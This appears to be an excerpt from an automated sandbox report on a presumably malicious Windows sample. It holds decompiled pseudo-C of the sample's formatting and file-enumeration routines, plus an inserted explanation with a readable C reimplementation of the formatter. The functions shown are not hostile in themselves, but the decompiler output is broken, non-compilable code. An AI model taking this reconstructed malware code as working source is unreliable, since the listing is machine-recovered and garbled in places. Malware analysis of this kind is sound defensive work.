                                                  • API ID: FileFindHeap$FirstFreeNextProcess
                                                  • String ID: %s\%s$%s\*
                                                  • API String ID: 1689202581-2848263008
                                                  • Opcode ID: 3cc723fa770a856a9ad4b071feef7facf257f3fef3ef6473236f4ee909822057
                                                  • Instruction ID: 64e856b175231b10b8a7f0f32b78d0fb4118fa1dc8ae40eb50ce56fed654d173
                                                  • Opcode Fuzzy Hash: 3cc723fa770a856a9ad4b071feef7facf257f3fef3ef6473236f4ee909822057
                                                  • Instruction Fuzzy Hash: AC31B670B00214ABCB20AF65CC85A6F7BA8AFD4745F10447BA906B73D1DB3D9E418B98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 97%
                                                  			E00402979(signed int* __ecx, short* __edx, char* _a4, signed char _a8, intOrPtr _a12) {
                                                  				char _v24;
                                                  				signed int* _v28;
                                                  				short* _v32;
                                                  				intOrPtr _v36;
                                                  				intOrPtr _v40;
                                                  				short* _v44;
                                                  				intOrPtr _v47;
                                                  				short* _v48;
                                                  				short* _v52;
                                                  				intOrPtr _v56;
                                                  				signed int _v64;
                                                  				signed int _t81;
                                                  				int _t82;
                                                  				char _t86;
                                                  				short* _t88;
                                                  				signed int _t89;
                                                  				void* _t97;
                                                  				signed int _t101;
                                                  				signed char _t104;
                                                  				signed char _t105;
                                                  				short _t113;
                                                  				signed int _t114;
                                                  				signed int _t118;
                                                  				short* _t119;
                                                  				int _t120;
                                                  				int _t122;
                                                  				short* _t123;
                                                  				short* _t127;
                                                  				char* _t128;
                                                  				short* _t131;
                                                  				signed int _t133;
                                                  				signed int _t135;
                                                  				signed char _t136;
                                                  				void* _t138;
                                                  				char* _t139;
                                                  				short* _t140;
                                                  				short* _t141;
                                                  				signed int* _t145;
                                                  				signed char* _t148;
                                                  				short _t163;
                                                  
                                                  				_t131 = __edx;
                                                  				_t145 = __ecx;
                                                  				_v28 = __ecx;
                                                  				_t81 =  *__ecx;
                                                  				if((_t81 & 0x00000001) != 0) {
                                                  					 *__ecx = _t81 & 0xfffffffb;
                                                  				}
                                                  				_t133 = _a8;
                                                  				if(_t145[1] > _t133) {
                                                  					_t145[1] = _t133;
                                                  				}
                                                  				_t118 = _t145[3];
                                                  				_t111 = 1;
                                                  				if(_t118 == 1) {
                                                  					L66:
                                                  					_t82 = _t111;
                                                  					_t145[2] = _t111;
                                                  					L67:
                                                  					return _t82;
                                                  				}
                                                  				if(_t118 == 2) {
                                                  					if(_a12 == 0) {
                                                  						_t111 = WideCharToMultiByte(0, 0, _t131, 1, 0, 0, 0, 0);
                                                  					}
                                                  					goto L66;
                                                  				}
                                                  				if(_t118 == 3) {
                                                  					_t119 = 0;
                                                  					_v44 = 0;
                                                  					if( *_t131 == 0) {
                                                  						 *_t131 = "(null)";
                                                  					}
                                                  					if(_a12 == _t119) {
                                                  						while(_t145[2] == 0 || _t119 < _t145[2]) {
                                                  							if( *((char*)(_t119 +  *_t131)) == 0) {
                                                  								goto L63;
                                                  							}
                                                  							_t119 = _t119 + 1;
                                                  						}
                                                  						goto L63;
                                                  					} else {
                                                  						_t113 =  *_t131;
                                                  						while(_t145[2] == 0 || _t119 < _t145[2]) {
                                                  							_t86 =  *_t113;
                                                  							if(_t86 == 0) {
                                                  								break;
                                                  							}
                                                  							if(IsDBCSLeadByte(_t86) != 0) {
                                                  								_t113 = _t113 + 1;
                                                  							}
                                                  							_t119 = _v47 + 1;
                                                  							_v47 = _t119;
                                                  							if( *_t113 == 0) {
                                                  								break;
                                                  							} else {
                                                  								_t113 = _t113 + 1;
                                                  								continue;
                                                  							}
                                                  						}
                                                  						L63:
                                                  						_t120 =  >  ? _t133 : _t119;
                                                  						_t145[2] = _t120;
                                                  						_t82 = _t120;
                                                  						goto L67;
                                                  					}
                                                  				}
                                                  				if(_t118 == 4) {
                                                  					_t122 = 0;
                                                  					if( *_t131 == 0) {
                                                  						 *_t131 = L"(null)";
                                                  					}
                                                  					_t135 = _t122;
                                                  					if(_a12 == _t122) {
                                                  						_t88 =  *_t131;
                                                  						while(1) {
                                                  							_v44 = _t88;
                                                  							if(_t145[2] != 0 && _t135 >= _t145[2]) {
                                                  								break;
                                                  							}
                                                  							if( *_t88 == _t122) {
                                                  								break;
                                                  							}
                                                  							_t135 = _t135 + WideCharToMultiByte(_t122, _t122, _t88, _t111, _t122, _t122, _t122, _t122);
                                                  							_t88 =  &(_v44[1]);
                                                  							_t122 = 0;
                                                  						}
                                                  						_t89 = _t145[2];
                                                  						if(_t89 != 0) {
                                                  							_t135 =  >  ? _t89 : _t135;
                                                  						}
                                                  						goto L46;
                                                  					} else {
                                                  						while(_t145[2] == _t122 || _t135 < _t145[2]) {
                                                  							if( *((intOrPtr*)( *_t131 + _t135 * 2)) == _t122) {
                                                  								break;
                                                  							}
                                                  							_t135 = _t135 + 1;
                                                  						}
                                                  						L46:
                                                  						_t136 =  >  ? _a8 : _t135;
                                                  						_t145[2] = _t136;
                                                  						L47:
                                                  						_t82 = _t136;
                                                  						goto L67;
                                                  					}
                                                  				}
                                                  				if(_t118 - 5 > 2) {
                                                  					_t82 = 0;
                                                  					goto L67;
                                                  				} else {
                                                  					_t114 =  *_t131;
                                                  					_t95 =  ==  ? "0123456789abcdef" : "0123456789ABCDEF";
                                                  					_v36 =  ==  ? "0123456789abcdef" : "0123456789ABCDEF";
                                                  					_v52 = _t131[2];
                                                  					_t97 = 0xa;
                                                  					_t138 = 0x10;
                                                  					_t98 =  ==  ? _t138 : _t97;
                                                  					_t139 = _a4;
                                                  					_v40 =  ==  ? _t138 : _t97;
                                                  					_v44 = _t139;
                                                  					if(_t118 == 5) {
                                                  						_t163 = _t131[2];
                                                  						if(_t163 <= 0 && (_t163 < 0 || _t114 < 0)) {
                                                  							_t128 = _t139;
                                                  							 *_t128 = 0x2d;
                                                  							_t18 = _t128 + 1; // 0x1
                                                  							_t114 =  ~( *_t131);
                                                  							_v44 = _t18;
                                                  							asm("adc ecx, eax");
                                                  							_v52 =  ~(_t131[2]);
                                                  						}
                                                  					}
                                                  					if(( *_t145 & 0x00000080) != 0 || ( *_t145 & 0x00000100) == 0) {
                                                  						_v52 = 0;
                                                  					}
                                                  					_t100 = _v40;
                                                  					_t140 =  &_v24;
                                                  					_t147 = _v52;
                                                  					asm("cdq");
                                                  					_t123 = _t131;
                                                  					_v32 = _t123;
                                                  					do {
                                                  						_push(_t114);
                                                  						_t101 = E00406A10(_t114, _t147, _t100, _t123);
                                                  						_v64 = _t114;
                                                  						_t114 = _t101;
                                                  						_t147 = _t131;
                                                  						_t100 = _v56;
                                                  						 *_t140 =  *((intOrPtr*)(_t123 + _v52));
                                                  						_t140 = _t140 + 1;
                                                  						_t123 = _v48;
                                                  					} while ((_t114 | _t131) != 0);
                                                  					_t148 = _v28;
                                                  					_v32 = _t140;
                                                  					_t141 = _v44;
                                                  					if(_t140 <=  &_v24) {
                                                  						L22:
                                                  						_t104 = _a8;
                                                  						 *_t141 = 0;
                                                  						_t136 =  >  ? _t104 : _t141 - _a4;
                                                  						if(_t148[8] < _t136) {
                                                  							_t148[8] = _t136;
                                                  						}
                                                  						if(_t148[8] > _t104) {
                                                  							_t148[8] = _t104;
                                                  						}
                                                  						if(( *_t148 & 0x00000004) != 0) {
                                                  							_t105 = _t148[4];
                                                  							if(_t105 > _t148[8]) {
                                                  								_t148[8] = _t105;
                                                  							}
                                                  						}
                                                  						if(( *_t148 & 0x00000002) != 0) {
                                                  							_t136 = _t136 + 2;
                                                  						}
                                                  						goto L47;
                                                  					}
                                                  					_t127 = _v32;
                                                  					do {
                                                  						_t127 = _t127 - 1;
                                                  						 *_t141 =  *_t127;
                                                  						_t141 =  &(_t141[0]);
                                                  					} while (_t127 >  &_v24);
                                                  					goto L22;
                                                  				}
                                                  			}

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: (null)$(null)$0123456789ABCDEF$0123456789abcdef$@hqt
                                                  • API String ID: 1302938615-2614879473
                                                  • Opcode ID: f15a26fcb67ac8c3f723ce47954d20d7f10a52d8297a6c6917a27ee851928607
                                                  • Instruction ID: 97c5a029f7bd061deed5de53ae2c465ffe7a046d42d5ccbe6c0c10904c055f90
                                                  • Opcode Fuzzy Hash: f15a26fcb67ac8c3f723ce47954d20d7f10a52d8297a6c6917a27ee851928607
                                                  • Instruction Fuzzy Hash: 6D916E706047028FCB25CF18C98862BB7E5EF85344F24497FE49AA77D1D7B8A881CB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 95%
                                                  			E0040306C(signed int _a4, signed int _a8, signed short* _a12, intOrPtr _a16) {
                                                  				char _v5;
                                                  				short _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				signed int _v28;
                                                  				char* _v32;
                                                  				signed int _v36;
                                                  				signed int _v40;
                                                  				int _v44;
                                                  				signed int _v48;
                                                  				signed int _v52;
                                                  				int _v56;
                                                  				short _v60;
                                                  				intOrPtr _v64;
                                                  				char _v68;
                                                  				signed int _v72;
                                                  				signed int _v76;
                                                  				intOrPtr _v80;
                                                  				signed int _v84;
                                                  				char _v108;
                                                  				signed int _t249;
                                                  				void* _t259;
                                                  				void* _t274;
                                                  				intOrPtr _t305;
                                                  				signed int* _t341;
                                                  				void* _t343;
                                                  
                                                  				_v16 = _a4;
                                                  				L1:
                                                  				while(( *_a12 & 0x0000ffff) != 0 && _a8 > 1) {
                                                  					if(( *_a12 & 0x0000ffff) == 0x25) {
                                                  						_a12 =  &(_a12[1]);
                                                  						if(( *_a12 & 0x0000ffff) != 0x25) {
                                                  							_t341 =  &_v84;
                                                  							_a12 =  &(_a12[E004027D0(_a12, _t341)]);
                                                  							_v28 = _v72;
                                                  							if(_v28 == 1) {
                                                  								_a16 = _a16 + 4;
                                                  								_v68 =  *(_a16 - 4);
                                                  							} else {
                                                  								if(_v28 == 2) {
                                                  									_a16 = _a16 + 4;
                                                  									_v68 =  *(_a16 - 4);
                                                  								} else {
                                                  									if(_v28 == 3) {
                                                  										_a16 = _a16 + 4;
                                                  										_v68 =  *(_a16 - 4);
                                                  									} else {
                                                  										if(_v28 == 4) {
                                                  											_a16 = _a16 + 4;
                                                  											_v68 =  *(_a16 - 4);
                                                  										} else {
                                                  											if(_v28 <= 4) {
                                                  												L24:
                                                  												_v68 = 0;
                                                  											} else {
                                                  												if(_v28 <= 7) {
                                                  													if((_v84 & 0x00000080) == 0) {
                                                  														if((_v84 & 0x00000100) == 0) {
                                                  															_a16 = _a16 + 4;
                                                  															asm("cdq");
                                                  															_v68 =  *(_a16 - 4);
                                                  															_v64 = _t341;
                                                  														} else {
                                                  															_a16 = _a16 + 8;
                                                  															_t305 = _a16;
                                                  															_v68 =  *(_t305 - 8);
                                                  															_v64 =  *((intOrPtr*)(_t305 - 4));
                                                  														}
                                                  													} else {
                                                  														_a16 = _a16 + 4;
                                                  														asm("cdq");
                                                  														_v68 =  *(_a16 - 4);
                                                  														_v64 = _t341;
                                                  													}
                                                  												} else {
                                                  													goto L24;
                                                  												}
                                                  											}
                                                  										}
                                                  									}
                                                  								}
                                                  							}
                                                  							_t249 = E00402979( &_v84,  &_v68,  &_v108, _a8 - 1, 1);
                                                  							_t343 = _t343 + 0xc;
                                                  							_v24 = _t249;
                                                  							_v48 = _v48 & 0x00000000;
                                                  							if((_v84 & 0x00000001) == 0) {
                                                  								_v20 = _v76;
                                                  								while(_v20 < _v80) {
                                                  									_t274 = 0x20;
                                                  									 *_v16 = _t274;
                                                  									_v16 = _v16 + 2;
                                                  									_v20 = _v20 + 1;
                                                  									_a8 = _a8 - 1;
                                                  								}
                                                  							}
                                                  							_v36 = _v72;
                                                  							if(_v36 > 7) {
                                                  								L67:
                                                  								if((_v84 & 0x00000001) != 0) {
                                                  									_v20 = _v76;
                                                  									while(_v20 < _v80) {
                                                  										_t259 = 0x20;
                                                  										 *_v16 = _t259;
                                                  										_v16 = _v16 + 2;
                                                  										_v20 = _v20 + 1;
                                                  										_a8 = _a8 - 1;
                                                  									}
                                                  								}
                                                  								_a8 = _a8 - _v24;
                                                  								continue;
                                                  							} else {
                                                  								switch( *((intOrPtr*)(_v36 * 4 +  &M004034D0))) {
                                                  									case 0:
                                                  										goto L1;
                                                  									case 1:
                                                  										if(IsDBCSLeadByte(_v68) != 0) {
                                                  											L36:
                                                  											__eax = 0;
                                                  											__ecx = _v16;
                                                  											 *__ecx = __ax;
                                                  											_v16 = _v16 + 1;
                                                  											__eax = _v16 + 2;
                                                  											_v16 = _v16 + 2;
                                                  										} else {
                                                  											 &_v12 =  &_v68;
                                                  											if(MultiByteToWideChar(0, 0,  &_v68, 1,  &_v12, 1) <= 0) {
                                                  												goto L36;
                                                  											} else {
                                                  												__eax = _v16;
                                                  												 *_v16 = _v12;
                                                  												_v16 = _v16 + 1;
                                                  												__eax = _v16 + 2;
                                                  												_v16 = _v16 + 2;
                                                  											}
                                                  										}
                                                  										goto L67;
                                                  									case 2:
                                                  										 *_v16 = _v68;
                                                  										_v16 = _v16 + 2;
                                                  										goto L67;
                                                  									case 3:
                                                  										__eax = _v68;
                                                  										_v32 = _v68;
                                                  										_v20 = _v20 & 0x00000000;
                                                  										while(1) {
                                                  											__eax = _v20;
                                                  											if(_v20 >= _v24) {
                                                  												break;
                                                  											}
                                                  											_v32 =  *_v32 & 0x000000ff;
                                                  											if(IsDBCSLeadByte( *_v32 & 0x000000ff) == 0) {
                                                  												_v40 = 1;
                                                  											} else {
                                                  												_v40 = 2;
                                                  											}
                                                  											__eax = _v40;
                                                  											_v44 = _v40;
                                                  											__eax =  &_v60;
                                                  											_v56 = MultiByteToWideChar(0, 0, _v32, _v44,  &_v60, 2);
                                                  											__eax = _v16;
                                                  											__ecx = _v56;
                                                  											 *_v16 =  *((intOrPtr*)(__ebp + __ecx * 2 - 0x3a));
                                                  											_v16 = _v16 + 1;
                                                  											__eax = _v16 + 2;
                                                  											_v16 = _v16 + 2;
                                                  											_v32 =  &(_v32[_v44]);
                                                  											_v32 =  &(_v32[_v44]);
                                                  											_v20 = _v20 + 1;
                                                  											_v20 = _v20 + 1;
                                                  										}
                                                  										goto L67;
                                                  									case 4:
                                                  										if(_v24 != 0) {
                                                  											_v24 = _v24 << 1;
                                                  											__edx = _v68;
                                                  											__ecx = _v16;
                                                  											__eax = E00403533(_v16, __edx, _v24 << 1);
                                                  										}
                                                  										__eax = _v24;
                                                  										__ecx = _v16;
                                                  										__eax = __ecx + _v24 * 2;
                                                  										_v16 = __ecx + _v24 * 2;
                                                  										goto L67;
                                                  									case 5: /* signed conversion: the digit buffer at ebp-0x68 may start with '-' */
                                                  										L55:
                                                  										/* the decompiler dropped the destination of the next two assignments */
                                                  										0 = 1;
                                                  										0 =  *((char*)(__ebp - 0x68));
                                                  										if( *((char*)(__ebp - 0x68)) == 0x2d) {
                                                  											_push(0x2d);
                                                  											_pop(__eax);
                                                  											__ecx = _v16;
                                                  											 *__ecx = __ax;
                                                  											_v16 = _v16 + 1;
                                                  											__eax = _v16 + 2;
                                                  											_v16 = _v16 + 2;
                                                  											_v48 = 1;
                                                  										}
                                                  										goto L57;
                                                  									case 6: /* zero fill from _v24 up to _v76 (precision), then the digits from ebp-0x68, skipping a sign already written */
                                                  										L57:
                                                  										__eax = _v24;
                                                  										_v20 = _v24;
                                                  										while(1) {
                                                  											__eax = _v20;
                                                  											if(_v20 >= _v76) {
                                                  												break;
                                                  											}
                                                  											_push(0x30);
                                                  											_pop(__eax);
                                                  											__ecx = _v16;
                                                  											 *__ecx = __ax;
                                                  											_v16 = _v16 + 1;
                                                  											__eax = _v16 + 2;
                                                  											_v16 = _v16 + 2;
                                                  											_v20 = _v20 + 1;
                                                  											_v20 = _v20 + 1;
                                                  											_a8 = _a8 - 1;
                                                  											_a8 = _a8 - 1;
                                                  										}
                                                  										__eax = _v48;
                                                  										_v20 = _v48;
                                                  										while(1) {
                                                  											__eax = _v20;
                                                  											if(_v20 >= _v24) {
                                                  												break;
                                                  											}
                                                  											__eax = _v20;
                                                  											__ax =  *(__ebp + _v20 - 0x68) & 0x000000ff;
                                                  											__ecx = _v16;
                                                  											 *__ecx = __ax;
                                                  											_v16 = _v16 + 1;
                                                  											__eax = _v16 + 2;
                                                  											_v16 = _v16 + 2;
                                                  											_v20 = _v20 + 1;
                                                  											_v20 = _v20 + 1;
                                                  										}
                                                  										goto L67;
                                                  									case 7: /* alternate form (flag bit 0x02): write "0x", or "0X" when flag bit 0x20 is set, then goto L55 */
                                                  										_v84 = _v84 & 0x00000002;
                                                  										if((_v84 & 0x00000002) != 0 && _a8 > 3) {
                                                  											_push(0x30);
                                                  											_pop(__eax);
                                                  											__ecx = _v16;
                                                  											 *_v16 = __ax;
                                                  											_v16 = _v16 + 1;
                                                  											__eax = _v16 + 2;
                                                  											_v16 = _v16 + 2;
                                                  											_v84 = _v84 & 0x00000020;
                                                  											if((_v84 & 0x00000020) == 0) {
                                                  												_v5 = 0x78;
                                                  											} else {
                                                  												_v5 = 0x58;
                                                  											}
                                                  											__ax = _v5;
                                                  											__ecx = _v16;
                                                  											 *__ecx = __ax;
                                                  											_v16 = _v16 + 1;
                                                  											__eax = _v16 + 2;
                                                  											_v16 = _v16 + 2;
                                                  											_a8 = _a8 - 1;
                                                  											__eax = _a8;
                                                  											_a8 = _a8;
                                                  											_v24 = _v24 - 1;
                                                  											__eax = _v24;
                                                  											_v24 = _v24;
                                                  										}
                                                  										goto L55;
                                                  								}
                                                  							}
                                                  						} else {
                                                  							 *_v16 =  *_a12;
                                                  							_v16 = _v16 + 2;
                                                  							_a12 =  &(_a12[1]);
                                                  							_a8 = _a8 - 1;
                                                  							continue;
                                                  						}
                                                  					} else {
                                                  						 *_v16 =  *_a12;
                                                  						_v16 = _v16 + 2;
                                                  						_a12 =  &(_a12[1]);
                                                  						_a8 = _a8 - 1;
                                                  						continue;
                                                  					}
                                                  					L76:
                                                  					return _v52;
                                                  				}
                                                  				 *_v16 = 0; /* terminate; -1 when fewer than two slots remain, otherwise the length in wide chars */
                                                  				if(_a8 <= 1) {
                                                  					_v52 = _v52 | 0xffffffff;
                                                  				} else {
                                                  					_v52 = _v16 - _a4 >> 1;
                                                  				}
                                                  				goto L76;
                                                  			}
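What the loop above implements, as an added example that is not code from the sample or from the report: a readable model of the format-conversion routine recovered above and continued in E00402BF0 below, that is, a hand-rolled wide-char vsnprintf. The flag meanings are read off the decompilation: bit 0x01 left-justifies (space padding after the field, the loop before L68 in E00402BF0), bit 0x02 is the alternate form that emits the "0x"/"0X" prefix (case 7), bit 0x20 selects uppercase. The '0' flag bit, the conversion letters, and the names model_vwfmt, model_wfmt and model_check are assumptions of mine and are not confirmed by the report. The return convention is the recovered one: length in wide chars, or -1 when the remaining slot count drops to 1.

```c
#include <stdarg.h>
#include <string.h>
#include <wchar.h>

#define FLAG_LEFT  0x01u   /* '-' : bit 0 of the recovered flag word (space padding after the field) */
#define FLAG_ALT   0x02u   /* '#' : bit 1, selects the "0x"/"0X" prefix in case 7 */
#define FLAG_ZERO  0x10u   /* '0' : assumed bit, not visible in the decompilation */
#define FLAG_UPPER 0x20u   /* bit 5, selects 'X' over 'x' */

/* Write one wide char; 'room' counts remaining slots including the final NUL. */
static int put_wc(wchar_t **out, size_t *room, wchar_t c) {
    if (*room <= 1) return 0;
    *(*out)++ = c; (*room)--; return 1;
}

/* Unsigned value to digits (the sample keeps these in the buffer at ebp-0x68). */
static void to_digits(unsigned long v, unsigned base, int upper, wchar_t *buf) {
    const wchar_t *d = upper ? L"0123456789ABCDEF" : L"0123456789abcdef";
    wchar_t tmp[32]; int n = 0;
    do { tmp[n++] = d[v % base]; v /= base; } while (v);
    while (n) *buf++ = tmp[--n];
    *buf = 0;
}

/* Cases 5/6/7 of the recovered switch: '-', then "0x"/"0X", zero fill up to the
 * precision, the digits; space padding goes left by default, right with '-'. */
static int emit_field(wchar_t **out, size_t *room, const wchar_t *body, int neg,
                      unsigned flags, int width, int prec, int is_hex) {
    wchar_t prefix[3];
    int plen = 0, len = (int)wcslen(body), i;
    if (neg) prefix[plen++] = L'-';
    if (is_hex && (flags & FLAG_ALT)) {
        prefix[plen++] = L'0';
        prefix[plen++] = (flags & FLAG_UPPER) ? L'X' : L'x';
    }
    int zpad = prec > len ? prec - len : 0;
    if (prec < 0 && (flags & FLAG_ZERO) && !(flags & FLAG_LEFT) && width > plen + len)
        zpad = width - plen - len;
    int spad = width - (plen + zpad + len); if (spad < 0) spad = 0;
    if (!(flags & FLAG_LEFT)) for (i = 0; i < spad; i++) if (!put_wc(out, room, L' ')) return 0;
    for (i = 0; i < plen; i++) if (!put_wc(out, room, prefix[i])) return 0;
    for (i = 0; i < zpad; i++) if (!put_wc(out, room, L'0')) return 0;
    for (i = 0; i < len; i++) if (!put_wc(out, room, body[i])) return 0;
    if (flags & FLAG_LEFT) for (i = 0; i < spad; i++) if (!put_wc(out, room, L' ')) return 0;
    return 1;
}

/* Narrow format in, wide output: %c %s %d %x %X %% with '-', '#', '0', width and precision. */
int model_vwfmt(wchar_t *out, size_t cap, const char *fmt, va_list ap) {
    wchar_t *p = out, body[32]; size_t room = cap;
    for (; *fmt && room > 1; fmt++) {
        if (*fmt != '%') { put_wc(&p, &room, (wchar_t)(unsigned char)*fmt); continue; }
        fmt++;
        if (*fmt == '%') { put_wc(&p, &room, L'%'); continue; }
        unsigned flags = 0; int width = 0, prec = -1, neg = 0, is_hex = 0;
        for (;; fmt++) {
            if (*fmt == '-') flags |= FLAG_LEFT;
            else if (*fmt == '#') flags |= FLAG_ALT;
            else if (*fmt == '0') flags |= FLAG_ZERO;
            else break;
        }
        while (*fmt >= '0' && *fmt <= '9') width = width * 10 + (*fmt++ - '0');
        if (*fmt == '.')
            for (prec = 0, fmt++; *fmt >= '0' && *fmt <= '9'; fmt++) prec = prec * 10 + (*fmt - '0');
        switch (*fmt) {
        case 'c': body[0] = (wchar_t)va_arg(ap, int); body[1] = 0; prec = -1; break;
        case 's': {   /* case 4 above: narrow string widened one char at a time (31 chars max here) */
            const char *s = va_arg(ap, const char *);
            size_t n = strlen(s);
            if (prec >= 0 && (size_t)prec < n) n = (size_t)prec;
            if (n > 31) n = 31;
            for (size_t i = 0; i < n; i++) body[i] = (wchar_t)(unsigned char)s[i];
            body[n] = 0; prec = -1; break;
        }
        case 'd': { int v = va_arg(ap, int); neg = v < 0;
                    to_digits(neg ? 0UL - (unsigned long)v : (unsigned long)v, 10, 0, body); break; }
        case 'X': flags |= FLAG_UPPER; /* fall through */
        case 'x': is_hex = 1; to_digits(va_arg(ap, unsigned), 16, flags & FLAG_UPPER, body); break;
        default: *p = 0; return -1;   /* unknown conversion */
        }
        if (!emit_field(&p, &room, body, neg, flags, width, prec, is_hex)) break;
    }
    *p = 0;
    /* As in the recovered epilogue: one slot left reports -1, even if fmt was fully consumed. */
    return room <= 1 ? -1 : (int)(p - out);
}

int model_wfmt(wchar_t *out, size_t cap, const char *fmt, ...) {
    va_list ap; va_start(ap, fmt);
    int rc = model_vwfmt(out, cap, fmt, ap); va_end(ap); return rc;
}

/* Format into a 'cap'-slot buffer and compare result and return code with expectations. */
int model_check(const wchar_t *want, int want_rc, size_t cap, const char *fmt, ...) {
    wchar_t buf[64]; va_list ap;
    if (cap > 64) cap = 64;
    va_start(ap, fmt);
    int rc = model_vwfmt(buf, cap, fmt, ap); va_end(ap);
    return rc == want_rc && wcscmp(buf, want) == 0;
}
```

The epilogue is the point worth checking in the sample: like the recovered `if(_a8 <= 1) _v52 = _v52 | 0xffffffff`, a buffer filled to its last slot is reported as -1 even though the whole format was consumed, so a caller that treats -1 as "nothing written" discards a complete string, and any buffer sized for this routine needs one spare slot beyond the expected length. Behaviours such as `%#08x` of 0xbeef giving `0x00beef` and `%5.3d` of -7 giving ` -007` are what an analyst would test against the real function (for example with a debugger breakpoint on its entry) before labelling it as the sample's private vsnprintf.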

                                                  Instruction address column from the report's code view (0x00403075 to 0x004034cf, with 0x00000000 for unresolved entries); the per-line alignment with the decompiled code above was lost in extraction.

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: x
                                                  • API String ID: 0-2363233923
                                                  • Opcode ID: 21533f40404ba542226bfa8572420c01b3bad12608f7d901757c729db8ce7d7f
                                                  • Instruction ID: 4e8d1baafcd9fe7d340f139674cb4abfd1a667ece1923e9a5fd415ceb2f85a4a
                                                  • Opcode Fuzzy Hash: 21533f40404ba542226bfa8572420c01b3bad12608f7d901757c729db8ce7d7f
                                                  • Instruction Fuzzy Hash: 53029074D04249DFCB45CF98C985AAEBBF4FB09305F108466E826EB390D734AA52CF55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 98%
                                                  			E00402BF0(short* _a4, short* _a8, void* _a12, intOrPtr _a16) {
                                                  				void* _v5;
                                                  				signed char _v6;
                                                  				short* _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				signed int _v28;
                                                  				signed int _v32;
                                                  				short* _v36;
                                                  				signed int _v40;
                                                  				signed int _v44;
                                                  				char _v52;
                                                  				char _v60;
                                                  				intOrPtr _v64;
                                                  				short _v68;
                                                  				signed int _v72;
                                                  				signed int _v76;
                                                  				intOrPtr _v80;
                                                  				signed int _v84;
                                                  				char _v108;
                                                  				signed int _t230;
                                                  				signed int _t252;
                                                  				intOrPtr _t308;
                                                  				signed int* _t343;
                                                  				void* _t346;
                                                  
                                                  				_v6 = 0;
                                                  				if(_a4 == 0) {
                                                  					_v6 = 1;
                                                  					_a4 = E004034F0(0x400);
                                                  				}
                                                  				_v12 = _a4;
                                                  				L3:
                                                  				while( *_a12 != 0 && _a8 > 1) {
                                                  					if( *_a12 == 0x25 || _a4 == 0) {
                                                  						_a12 = _a12 + 1;
                                                  						if( *_a12 != 0x25) {
                                                  							_t343 =  &_v84;
                                                  							_a12 = E0040266E(_a12, _t343) + _a12;
                                                  							_v24 = _v72;
                                                  							if(_v24 == 1) {
                                                  								_a16 = _a16 + 4;
                                                  								_v68 =  *(_a16 - 4);
                                                  								L30:
                                                  								_t252 = E00402979( &_v84,  &_v68,  &_v108, _a8 - 1, 0);
                                                  								_t346 = _t346 + 0xc;
                                                  								_v20 = _t252;
                                                  								_v32 = _v32 & 0x00000000;
                                                  								if((_v84 & 0x00000001) != 0) {
                                                  									L35:
                                                  									_v40 = _v72;
                                                  									if(_v40 > 7) {
                                                  										L63:
                                                  										if((_v84 & 0x00000001) == 0) {
                                                  											L68:
                                                  											_a8 = _a8 - _v20;
                                                  											continue;
                                                  										}
                                                  										_v16 = _v76;
                                                  										while(_v16 < _v80) {
                                                  											 *_v12 = 0x20;
                                                  											_v12 =  &(_v12[0]);
                                                  											_v16 =  &(_v16[0]);
                                                  											_a8 = _a8 - 1;
                                                  										}
                                                  										goto L68;
                                                  									}
                                                  									switch( *((intOrPtr*)(_v40 * 4 +  &M0040304C))) {
                                                  										case 0:
                                                  											goto L3;
                                                  										case 1:
                                                  											__eax = _v12;
                                                  											 *_v12 = _v68;
                                                  											_v12 =  &(_v12[0]);
                                                  											_v12 =  &(_v12[0]);
                                                  											goto L63;
                                                  										case 2:
                                                  											if(WideCharToMultiByte(0, 0,  &_v68, 1,  &_v52, 5, 0, 0) != 0) {
                                                  												E00403533(_v12,  &_v52, _v20);
                                                  												_v12 = _v12 + _v20;
                                                  											}
                                                  											goto L63;
                                                  										case 3:
                                                  											__edx = _v68;
                                                  											__ecx = _v12;
                                                  											E00403533(_v12, __edx, _v20) = _v12;
                                                  											__eax = _v12 + _v20;
                                                  											_v12 = _v12 + _v20;
                                                  											goto L63;
                                                  										case 4:
                                                  											__eax = _v68;
                                                  											_v36 = _v68;
                                                  											_v16 = _v16 & 0x00000000;
                                                  											while(1) {
                                                  												__eax = _v16;
                                                  												if(_v16 >= _v20) {
                                                  													break;
                                                  												}
                                                  												__eax =  &_v60;
                                                  												_v28 = WideCharToMultiByte(0, 0, _v36, 1,  &_v60, 5, 0, 0);
                                                  												_v20 = _v20 - _v16;
                                                  												if(_v28 > _v20 - _v16) {
                                                  													_v20 = _v20 - _v16;
                                                  													_v28 = _v20 - _v16;
                                                  												}
                                                  												_v16 = _v16 + _v28;
                                                  												_v16 = _v16 + _v28;
                                                  												__edx =  &_v60;
                                                  												__ecx = _v12;
                                                  												E00403533(_v12, __edx, _v28) = _v12;
                                                  												__eax = _v12 + _v28;
                                                  												_v12 = _v12 + _v28;
                                                  												_v36 =  &(_v36[0]);
                                                  												__eax =  &(_v36[1]);
                                                  												_v36 =  &(_v36[1]);
                                                  											}
                                                  											goto L63;
                                                  										case 5:
                                                  											L55:
                                                  											0 = 1;
                                                  											0 =  *((char*)(__ebp + 0xffffffffffffff98));
                                                  											if( *((char*)(__ebp + 0xffffffffffffff98)) == 0x2d) {
                                                  												__eax = _v12;
                                                  												 *_v12 = 0x2d;
                                                  												_v12 =  &(_v12[0]);
                                                  												_v12 =  &(_v12[0]);
                                                  												_v32 = 1;
                                                  											}
                                                  											goto L57;
                                                  										case 6:
                                                  											L57:
                                                  											__eax = _v20;
                                                  											_v16 = _v20;
                                                  											while(1) {
